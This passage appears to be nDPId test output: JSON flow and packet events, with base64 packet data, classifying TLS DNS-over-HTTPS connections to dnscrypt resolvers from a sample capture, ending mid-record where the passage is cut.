-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305650,"flow_last_seen":946739305650,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739305650,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":946739305650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739305650,"pkt":"REREREREZmZmZmZmCABFAAFBLvBAAL0Gw1EKAAABrGhdUJ\/qAbvjN2w6lQOuzlAYAfbLqAAAFgMBARQBAAEQAwPaSOnODEW\/53X3FLI0n+Mih\/iyk2Bze7sXLhS9N0ueoyDada2r8SjLZf4K7a+NbQASLzSYT4924P6pAuqOJM8\/hgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALanAudGlhci5hcHAABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgYin8bJdqHx3ibHrbfDgwuFVcZV3PPNkWvp1zHo7\/2AM="} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305650,"flow_last_seen":946739305650,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739305650,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":946739305852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739305852,"pkt":"ZmZmZmZmRERERERECABFAAXUYr5AADcGEPGsaF1QCgAAAQG7n+qVA67O4zdtU1AQABbJOgAAFgMDAHoCAAB2AwMioc+jlzNc+VBJaZcDKojs21jGEKcSNKyg9ExllQqy+iDada2r8SjLZf4K7a+NbQASLzSYT4924P6pAuqOJM8\/hhMDAAAuACsAAgMEADMAJAAdACAdEExo5yrIKmMZ4nrOia6UHa7Zh09ZMNUZYLDF+NYxaxQDAwABARcDAwAkT\/VVW9e6tSXUn2DgdOFI1vJ9CWMqaG0B1UgAogfcRWwpZ74dFwMDDDNZ3TFhx2HRd\/d\/BnLRqx3w9gJyapE59ga0mk6Gbdpy2uhfU1raH\/kLDwO0PHahqFeiov5PtmafDzH5oAzRDBThfFaKNK986AJtqna7+\/+W9HqZppsUeMeFtSdutMbm9VkvNNWFsngalQ8\/TjlWYt\/LNabidW0R+diEYRXkVHectSDnGgpIKw7AqJmgGmRJSQFZmk8mMFHUip8Ns8L0Qm+4mFM3OyM2y8uotBFp52jwBE4JcdWTlWvX638UUEwGd0+Jev1b4UZvqaI8gBJQiwDYthQvx2cilE03gvQZUs1gLv40OT\/eDg1VwASYtXu1QKuaTXj67d3FvJUxTfjdc9Un1x\/xpNxQ9IvL0JgGMqp5Nvz4C+qRYd\/CysKeUwM5LkGikxDP3qZXZjcRDF3CvWl\/0RJAgB68oCh4lzQ6BTBYQsLIO+2npSdMMO1mcmGxOeyAtRoiglI\/Mu+7bxclTAdkFUgpS6V0wzwluZmFW7Rx4iiSeZWVmQDKjFeHStRAafyFrtH26wCU1ei1O7zDiCd\/St5EWtAfoATjugif\/dASmeS6peR\/N837DyefuOM7XNJbAUXXdVYFQbj88dVPYC1ZWfSpl1wPAKf87TREgv6h4ZkxzRnB6COvKSvUqklCC1SSMJfennS1L0Etglf8wZsulJYWIe6+sEiyvEkrN24bb021w2X\/KuVEn+j5dyEDiGG5loD+4VYwc9G5Wa+jxRUO0+A62CO2opPif7xWIxQXRSJ441bKp\/i7j7P+cl88sdZsTxv2ygPWKGEBO4XHbg95EUra3m5LdhfhQUM\/e\/n+Ak+LAL3mStir5xjEDf9+haA4s5VbKmTRNrJtFiUwt198TeBjvlKCejLbJO6d8gE6SQECz4iM7IcNa\/bXR7adNUuu8qhullq5WfyiHcztVpItdHmrHXbaCsGaPgIKVpIJp30oUBjXbdyBrklTyARetsx+L4hfDlDZiZOEujpickcQVHRV+Rq6dF5UrRJYU3XU\/ZcqBeRvNXpu9d46M\/bhnVClgq2Bd+aOiR2kaho07AGNJ9Fr4k5Jos+2Q6DGpQasXC6x+iPauGKBp59nwGXbOOKtd8ArTxOlVzQmOZH6I0tx+iKMplPSCHR8FFec2EwXBLm\/1vyI9Pwo+zYiVdHp09rRHeJXaKGgiynxtv128gHPWfts6k\/bUS8N1Dw2y1OWa2cDxVOv79IA65ALHyABrPQbEH+byQd5tzeWrWUmzmNi3p4jdd62IgsA8HkYmsZmy5jIyKyWEYlUo1S
PeqjIhX9VriaKoSoSKPFRDULdhc+03ZBXd6SKMHCSS7x6DpL0ufFkfc0ZfcGyz8s\/jngcscp5gmPQrY+VfOmrZe4EnOIAqkwdbS5Vejc5Yga2D4LRGGWgMYBm5SScqu5500ZCpE0WmkryZPm\/4OMJ47iDZWRTkVie5Ea9ONRDlM9tVglWZF\/oUiAJVVWh4mt0z6nVYUgTMbtTn0pDKN\/0TJikQ5gt3TXgtioj57ko+eiK8raQcuhqyXG3KA52lsLM2MmWuS6VxCjD2hxANDc3R7BZOaM4bmyza4JUsEms3Y5aNGYiFwaMTvyvPSX55q5QHTJ\/Mi827fNg4TtCrFRxN6XxJuU0RfIATOX3faQkD1YP1V51gStaTXEj1EBrNyqEnKqYk6Yxs2aBmn4CqaTQ7ru+2yyoapdX3D0JCzKb"} -00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305650,"flow_last_seen":946739305852,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1733,"flow_avg_l4_payload_len":866,"midstream":1,"thread_ts_msec":946739305852,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-03431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":946739305852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2248,"pkt_l4_len":2214,"thread_ts_msec":946739305852,"pkt":"ZmZmZmZmRERERERECABFAAi6Yr9AADcGDgqsaF1QCgAAAQG7n+qVA7R64zdtU1AYABbTIQAA7khOXiRDmimON10SUW6EdkRNtideeCAmsCP9ufTAbxPBEESbRp6rJdX9WpgeGKEcs1FSJYqSgEbwbmVZ45a190xHBVgYJoheRrXwVU8\/AsBaHDXul428WYkRrLMS2d7ip3ZonDd7PZHF6J0j5\/wI70KV9AUCOBt\/Btv4kzO+Hj+j3yK5bLSbWlRhD1fuMQAb+cF537u0\/U3MsC4OMo+87usOrwz6eMrKL+s31DCb4z6f8eENi68oRi9OZYKpoRYjhFkw0unmspSreLKjulrpWluVXrk1btWPgYpUVnavuXquTK1NtVner355EoOvAf5CAN1Y8OcMXqML8XqYMeqEg34ZtCcYr+tnetE29K921LwsoIOkJdbaiCVLTv\/9X++VjLPLL4afBqrrwx2ZkXw2VSOvNSpMcVsFQ2sks0er7rCvo3vy970zXk8N2ZRM9DEPyk4S8i+C3Yw3j6efIbDNyRRGIb1TGn6z1LzsFfHkHQ\/coPiZhIhvnK6o5iGWcHYOGEPLh4XlmZt5EnCBavREWdcXDAq+Rj+biwLLNbp9Xm75T3bbWxLQivCzGfNO2oBB8jJz2Zicez5S7098raXjnFVLWws7S\/ZjTQ11gAbLNqyHJOm\/RerOFZpkbGJsCCKjsmgBFYujoZTifdvrnskuFGuKqjRU7sBnWY38jO4yTlznAvt2Cf2\/I4bnh5roD5\/h3R\/5c28EQTDGmOL2\/KspdGSS1bjToJBQbcS2YbFnjwR5yrS+5SOLXVmRcZDGU4Ke3DaCJifWpD1EVuVb2ilryPAD8yGt9JaIe3cT9jnaxoJojKtbQNqrLa4+HAzDJSTrT+I7IXNvzHDQ5HJdRQkyKEzhMuedfOGX3aae0qJMXEdgmL8U1YL9LUgqs4gaInFpYecyGYMFaC7RpVTbVJ8AclN3JFij4ikMLs8OvolwBsIUxkwvTd2kxXvS\/GtkZpTdB40Qwypq6\/slHam9c8zmzEZ9VsQqYPOs7EU3IWXPB\/7jwR\/Swoqx9IepHlyCi3ipHUa3krt79WKeMN9slFrvDSuGQo7cCX4PwLWqGq1s8n4xGAwbb4PADqo8FJSgQHdjNMolIHMWyuqk5nqOgc0W36SeHQOxctDFxw00aD7\/ZIjnA7m+97J5Qh0XWgw5Lpsc8Mvp+VBxyMQklBuDFOyN3HJKbg943DoSjIMucZn1tzh8KOxw0Xql8+gP0Tj\/ncw8jVi\/PzuMVXmWMiQX\/wdJfEzJkJUlcXDAAE2IesO7KR0oZhnwcsaVEwrsJruOKxYtv2pbkmhOIxpFm4wJGmE+2JRFXkQDnRtvWvAJoF\/v0k69TDViO86TF2AjLFejfwjQQnCJXVkS4fuCh3i1TYrS+lUkfVezPrjjWW3F2LEdQQXJZmRfoBHSJjBhCP+Dcoc3jONSa9PXKqNJSf7Vo6MbkHB0XBcD7sdIZ2\/wIgxkllAd1uSaGBwJI8\/jhtA8RENMPWOxsz00xpbl8rHi+OkSD\/7Q58nbh7qhfzlemdSm
sTNYU4yTeEr2yQTmNZcolwert2uPuF9VK2g\/3nveH2piPFCpAJOd4Z5dmxFR4fRYAGlILa5aNYiyWSR3G947wAwiYaU7l0JrzUlByQFpex9hGDkjjcctCUn8127O6yoOswVES887ts\/gfsXkn4d0JROgJbDiWFnN7j7+sZKWDkghhJYjTBSDkBNASiM9XLxgQ\/DaEwEwxYA7HjPEO\/8BxDusP8aK8hEqBPa8c8eFHdAYT3Eu2hChRagjV1O7Z0Zuc1z25GaMGiFKl7kwOrHIqt7609HLDEc8DgoFPHHr7IZJAecPMzvqj2CVzFTWl+NcGQgu1OZDB7YN8IsYE0Hj2wxjJJ4M8ncKFSWkLxvPRwAg+0hpC\/tSOqvX1jgKKAZg82Jl+tqVLBoZ773\/7qHfr\/BAX6oJ0vKtNpEDEGeMy6jjr8KxmYOPhgJuUsXOSiQKReqTW0HLQJn9LpGUn4zKUgOBpUtJCVQOwstz8rJvV98lhrypc92o1bXoXeUIxGojGdQmZAgxriin+ux8aVQDWCuRuunDdKlwCqYBaBQ5f2rPbpDMmRJRFIQV93Nffpu5y2M2nD2zqfxShtHtZqK9Odguom6eKtfMYRNoP0\/G2utDI3qzWXA4Mjnq20qW6WLp3\/OACxfwxJs+mIIux4CN4Of382BKD+HUg6iVDD+mi+PZO8yXcm+iMHr94FuVjknbJgwr8pz8hnl6BJO7Py9BRIAZSwIskF6wOgI\/\/4Qr2JcZ3TwaII9SEN+0Sx8PMXXAKDv89DA4GNqNhV0hw6VXwyvbxpg4tI+badMBjtd\/o4XHqPH+BgFz6M8EMB4Jddticq89uWfyyGOVmNlx8K6oUYEdD6RJBEwIP6yYPzzeebCbDK3en7B16cFcus7h8285+5Wxpsa9ruV64Q9ZoEhEUMGgffnT5ajZ+UpmS77fDl+DfNEzJY8TjXm9EL8XAwMBGQ9SGwhaT+0AWTV1WADn36NruqoDTHdQXMB5KJVX+hyENZfYkPjY19bk0TmuSlxnW4sPXtcFmHvEzv8TYCgHXXFqdgaXEgdtFhRRSPS0CqywSlTwtg9zlqkP6Vu\/gi2jnM2lX\/S3paNkHLJK2Xs42G6p+yMmyRBfn14DEFDykxvC8z+scW1WMMiVZcbQBKhJ+Ek8WtRoS9WYaJ74jobV62XFVLje4Al6wOy0PssyggYMNCsvtsxQ5KXxmsj4du7sF6hIaLMWOz7O8LamYiEYnY4YByhzDbINOM3XB385ribm3TlBE2FwQhpCNmgQNjG7wIBC9IfEBLxv5rxwvF8PVckgsWpRxADmo+gltAb0\/tgSzKl\/30lZxZ8BFwMDADWhE8bE7ktzdpeT1iEQv9HPHLrjBcBDs9EHJnB16E0omVuS5qQqwxUOOBNAVfkBff92\/dyz\/Q=="} 
-00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310588,"flow_last_seen":946739310588,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739310588,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":946739310588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739310588,"pkt":"REREREREZmZmZmZmCABFAAFGz7FAAL0GqFMKAAABp3LcfZKaAcWpCIgSh0x2XlAYAfZF5QAAFgMBARkBAAEVAwNM+6CQ4xrTV+1tOPP7h0Gj90S89M7DOPc8QQnDuq\/mRiD0eC9rhNsSjRzwJJQFthL\/q1ufnITsbP94aSBdrdhzDwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG5zMS5kbnNjcnlwdC5jYQAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDUjoSgwC\/YwRC2sL4\/9W3ATSzLtM\/v84EfifaAhQZfWw=="} 
-01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310588,"flow_last_seen":946739310588,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739310588,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-04673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":946739310697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3154,"pkt_l4_len":3120,"thread_ts_msec":946739310697,"pkt":"ZmZmZmZmRERERERECABFAAxEyD9AADMGLsinctx9CgAAAQHFkpqHTHZeqQiJMFAYAfVQ4wAAFgMDAHoCAAB2AwOMlhGBzZbQdgMB7SlRRNR6aAHyhH11lUBOX85ujHC26yD0eC9rhNsSjRzwJJQFthL\/q1ufnITsbP94aSBdrdhzDxMBAAAuACsAAgMEADMAJAAdACBUUq246Yl+EWhWLEvZvcutMb+IirYuhEzXmLk3lr59QxQDAwABARcDAwAgZrqPXWP2zV85oWOqSEKZV0DzXUfiOwwJJ+C5CgZ1QqEXAwMKFVw16EKwmaYl6UqgM5FDRFEvQkVVdsBwborgCOxUvP2YbrJsHBMovDHHpAcBFTWebPQJMSKasadU094aHDRpLPrxxCjXB2pxM0WIqTvteHWIfU1Fk5\/NpqSuHKzO0Ra3PwdESYixe\/zb6sDdKKc1TRT99VsGnFNvwT\/9kRj6LGAVtWhnVsCfJH598qgWQ0wNsN5\/qg97535WjDSAoptbAHelOwuJgc8mZW87Z778lSdbGSJVYmbS+Kzpu3czloyo+k8tnMR0gAcl1hEQQ49kVF90oJqhnl11GE\/B0nhnrDcMC484Ni2gzPflOc2ve4l75Bv19quG6UuBjAJ+lAILT2sCAli3NgfXnu\/RIxYWHOwg5dkUsitPEbeddf7oCeQEhHZOIe8IWZHCTWJ8Xas6gq1DtDEctxSwxYTmBOPQYJURvi5XAJunxgkYorZ1S5H22PsJbPQoDTXE7jb\/MK+t+sJi\/qLBk\/QTcK+QjjpfOnPOG6kcTfb96PDiNmimFlhI+7qPbHOuBFKP3RlOfNCtE0LR80aRulQJ7mOKrhCqpMkFgCoXo\/4IvZulEfNa6rLjjxU0mGwRO9C\/8SUW\/MWxf9V+fhaFIFLLIrdk9mjlOAh4RTjBuIhZwdSm01OHFabvxJQc5nWUTI8sDv\/4Hth4Nmyyi395Zo\/bIgvPNsPA6YqSbJJPw7TRXj9EpeXABU58rfRMlnEHMcHSeAnr61+lHN29cf2rb7cQuEObxOV+r0Ti2hnTxG1kzZXxUKMf1TJz\/QNCPdFs\/8sc7I75BLceNNdyiMxbhvl0\/mQYkbbTX+E01I4nneSr0YAWi\/dj5OFWkY5oKdT3ijaj5ZnH8mUoUzF6gidtHrJfWLUutNNAVK0ii3hJTxAh53tLa55cziofBXUjER9OxqdXFQX0xk0dW5\/N25Am3sfN4K9G9Or+Mq0ZjCUN\/b\/4AAu5iVdc2xuiywbhKCKv\/+1ba649i2+11N2NuNP4WLerjRdmVgUEXTqjPsE1bvdPpgn\/tgD\/NfJO4snitGVo2fF0AIvoI8ffNDBM8mHNAe\/P4wCN21PuNzrXMiMwd7BKvHy1yaV3bx1ZcbZVsRq2ArQ\/sz1xvbYIM5K\/4uE3U5TUD7iEvNa+H0F0t5Pm3xl9hPFjB8UQZyCzE0eaHFxztuY1AhJrANiSpn9KUApux28hlfmPpxZwwY\/4voaTDNDh4a6l1L\/5bBlTMZQ8ZTPo3KsCc7rYoLRgUBfec4EVT3pXIcfZwnttUMEultj1OSOdAYKMUV
l+Ae797PlHj+BPOvQU1JP+1NxmeW9EkPxvKNxTuFB8Ql03lSa0sP7N4iOT4LxwTyM6btUOuFjsDMq5fFh3z8x6u4eDmVvymYi2lDSt123i5VnAGlmqe2vlBnBoLSjRbpHHKNWC14LFSfaclke+Fsk\/LXqRdmrmwoK42FR8QM5yBJ4V4XBtfp1iJayJWXrv2Yp\/Jw2nGI\/8spJXweIKBfFJYNDE+FKqYVx6uY0QURwmsxmAiNbUSW3iE5ptj6f47Bqqzcu614k3woIktKLvq+R5kAUl\/94OeFfc1MDcYQiS1itHZ6WgYMqXlALhkIaagT341vLWH8EINXXu\/JPbuL4ratmRZsOHcAq4Z64Qth7VsN\/NAOgVmBZa9WLc6jmBs+\/7oNewv6pYbinaC9eFjw+AUviDZIoPDTI2cqHtCKNJKtQeYF8JwZdso+kGs0e4hY6Ekh+Gt4QIAdcddPMJiEMdHRRcI7TJwLsTmixFKIFFEmFMcRnAgRce970vQl6+J2m\/3\/zT76RlKTnb6S5cA2Gh1xVWfifqZ+dJJ4S6U8o2kzOx1BcO4lPr6QndhbLXBopt+TnAxhiNVC0jGSLxxKfJsKliuCmauybike5VfhMB74\/Zd9LI0lHZcyjtrJZpkqIdf9mUmq84TeFEVObpfDxeDp9pwfwnzY7CZiAhc8H7X\/B4eL6QPbJJeDvWRsaiMa8MtOGUovwBK\/1RmmRbBs9Ps\/WvCegAP2zZsifFoeWn3IFAPuF2t4F1jzP6KFB2fJjiCF\/xSMUdVX4mSSLxUy6Noq6HH8DTkiTT7i5Rtb6Z+6YPqTrIz0kRUJm8ymK8qGaWvXbafgJW+zAD6LQJ6Uz\/H9ede+fQeVaNdwR2ZGANN93T8+CUOO\/5QCgVylxvI+WkULYljrgmsAHGf2x4K+AdzUNCRbtqqamvoa9+H9TZ6D9K0XHtu60WRh\/xvg+0kvul3oISkBwW\/5VC47CJIkeqDKIcaH28dzjF68bVaWHBCOA\/QVspO8f7PM39uibr2ZI\/9qT7jw8Z+41laurnLDDiiTcv8nIyk9gPkkLpL0gZ8B7RwNepdi9poakmfyvLsu7noykkUZPrrciaDs4AxlMW2SE0l6ggoSXHblXDfGv1qrkJ+wYHqoIpx4Orz9BIDwmFuIK9uApDePCMMJ8COMRLP5+c7CWBbef3qNt43feI9i3DxrqohnnAeDQ5XayaaeIrWeswn\/yTkRhpCGBJsg0rlCy0bwelKJ5jOd0Z6yAeLdgeBTN7mANe1L7262l3N\/TUj4BGdpkUJSKWZ+F5L9xh3ZDx0CN7nut3setCOi4jALV8qZWBwNBsnPw\/1et9Mhz5yQU5W4hKDkIkR0JbpteXZI\/YulIUs304N95S0rMRs+F91Z\/I1bjxYITEBnA3nKgeOqnJG67UQeyBJy3Wot3ZWs1FnfHSinzEDRXoy\/in3NMk3Ee4UJjJJVvh1u1kB0flpae3nwu8yHniwAQeA4V\/IYlytwzxmH9UBxClJ1YaCH4QYvYTNNn4X5yrgDRFy8aRZbx7KFTZjETXMAwD7jXdzFpBRNyur7a5hxwjkpR1nPJHXNHbl9ulhBQraPk64O22lXmWhmTqqJxPCHLTJc8dCW9Tw+MWIDqlSC6iP\/uFGWMugMNTbPpm71YwCV6DE3MM5Iw3r\/pJtSMpVM1czkfmhYfe8YtiZEI64Bh59v3JQ7Geu6i4Q2THuBrvHiZucUzufDS6W\/DBGI9K4\/J9OjIx3bbp4KuEgDSz3alUQX8h9N3c6Ve\/ecJdJcy74VVi6oGyfaHP6IVk7S15X3oTFjfGBcG+hk0a0dR\/W0BGALH+pY8iH726JsGgeEg52jxxJyoyqN2BP+Onsb9VAjI4Axsa9MyFPMa6R4QE78VraMZsIMjQY2e6jOI2lFaIx1i29CS8IB7OY+l9i9GRSJhN1TC+qRidWiZdwiZ6CGxjzCAIjCNtY
YMpt94CcLWARqfnvGVuwq7RqWOpW3L6qgDcGRhcwof3dXDPhz02YMhWNSauXVnUXZfqF8vmR+tgeJWIevQpdj5ioEIsT2Um5j+gijjHh859fJLDhzYVmYtQ3TEi737GfFw2SXnggL\/Iy07c7IZEI94AezYiyRdA9+kLWGaO\/dAL2rthXXz37bspZFnOGyuB0KI3G4RabCIXAwMBGcOMNM44BDplKj\/3Ojq4jdtuoD82NTa5b2k5zkFslQd12hFn3q5eB44nkwI465O8I9pSVocWpqU9EbYhTvyK1R8N4URD7Q5PMRg7Umy5tkS2hB9uZLmMl9DoKxlIW+kyr\/KuqeGrCAN583A5M1yhRuOwYF56CIKxvuyChPRKUAt8\/70gOTQjynH\/\/1nGoYgPF\/ta4eVsTLhuzDLb9mQMc16\/4VLa51E7HgIT9to4lg95nWvnMoIyp4a8sRcKKCYU92Ot4xWr0tqEIEu0fXIbk7\/Ta2loRt8FUwirJas4rlQGX1glaJy9RyPTHTwKV9kLdjGIRncOAxHu\/8Q7IfLg2aWJ07\/3naoyq6szJDQTcE3S8LB44P4jJ13NFwMDADUJ1y22teIy1dcIiwJwX4cS160nI55Nkh7bUzq2ftRXjrZxugVJnOhQTCokK54\/+GLzaYeqbw=="} -01090{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":74,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310588,"flow_last_seen":946739310697,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":1693,"midstream":1,"thread_ts_msec":946739310697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":946739310700,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739310700,"pkt":"REREREREZmZmZmZmCABFAABoz7NAAL0GqS8KAAABp3LcfZKaAcWpCIkwh0yCelAYAfVFBwAAFAMDAAEBFwMDADWIup5ey1m73Olzdr+La\/pgBsOV2156nE0gjo7pkVZbX+HWq3wNBOBZgTPS2Gv4V1H1NoVl6Q=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310980,"flow_last_seen":946739310980,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739310980,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":946739310980,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739310980,"pkt":"REREREREZmZmZmZmCABFAAFBYCBAAL0GW60KAAABuSuHAZUqAburhCguMeSlTVAYAfYCHQAAFgMBARQBAAEQAwM7gJo4OG7S+iUgpLXTuxo5Xw1OBGj4DiyxVBvpcTjrrSC1ygzgmnU02BGfASVXjVBWPNfoJIqu28ODMXbR4UvXGQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALb2R2ci5uaWMuY3oABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQ